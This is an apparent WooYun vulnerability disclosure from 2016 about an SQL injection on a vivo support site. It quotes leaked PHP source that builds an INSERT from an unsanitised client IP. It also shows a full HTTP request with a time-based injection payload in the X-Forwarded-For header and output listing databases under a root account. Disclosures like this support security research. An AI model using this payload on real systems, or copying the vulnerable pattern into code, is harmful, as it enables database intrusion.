当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0179351

漏洞标题:vivo某信息泄露分析源码导致SQL注入

相关厂商:vivo智能手机

漏洞作者: Forever80s

提交时间:2016-02-29 09:47

修复时间:2016-03-05 09:50

公开时间:2016-03-05 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-29: 细节已通知厂商并且等待厂商处理中
2016-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大致看了一下代码,找个洞

详细说明:

网站备份泄露
http://zs.vivo.com.cn/vivo.zip
因为源码不全,找到一处疑似insert型注入
download.php: 文件

<?php
include_once("conn.php");
$type = $db->inject_check($_GET['sel_type']);
//$type为1表示下载正式版软件下载,$type为2表示Beta版软件下载,$type为3表示驱动下载
if($type == "1")
{
$sql = "SELECT * FROM software WHERE id= (select max(id) from software) and en = 0";
$result = $db->query($sql,$conn);
$row=mysql_fetch_array($result);
$link = $row[url];
Header("HTTP/1.1 303 See Other");
Header("Location: $link");
$nowtime = date('Y-m-d H:i:s',time());
$ip = $db->getip();
//插入software数据库
$table = "softwarecount";
$columnName = "id,ip,submittime,version,count";
$value = "0,'".$ip."','".$nowtime."','".$row["version"]."',1";
$db->insert($table,$columnName,$value,"");
exit;
}



黑盒测试果不其然

GET /download.php?sel_type=1  HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1'+sleep(5)+'
Host: zs.vivo.com.cn
Cookie: PHPSESSID=f706d4f0f989c639cbaed30ce6b8b0ae
Accept-Encoding: gzip, deflate


漏洞证明:

available databases [5]
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] vivohelper_db
root权限
current user: 'root@localhost'

修复方案:

ce.wooyun.org

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-05 09:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无